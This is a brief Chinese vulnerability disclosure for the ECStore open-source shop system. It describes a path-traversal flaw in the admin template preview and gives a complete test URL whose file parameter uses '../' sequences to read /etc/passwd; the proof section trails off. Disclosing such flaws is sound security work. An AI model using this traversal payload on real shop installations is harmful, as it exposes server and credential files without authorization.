ECStore开源网店系统任意文件读取漏洞

简要描述： 后台模板编辑功能可越权查看系统文件 详细说明： file参数对../未做过滤，导致可以跨目录读取文件 测试url：http://shop.xxx.com/index.php/shopadmin/index.php?app=site&ctl=adminthemewidget&act=preview&theme=ecstore&file=../../../../../etc/passwd 漏洞证明：...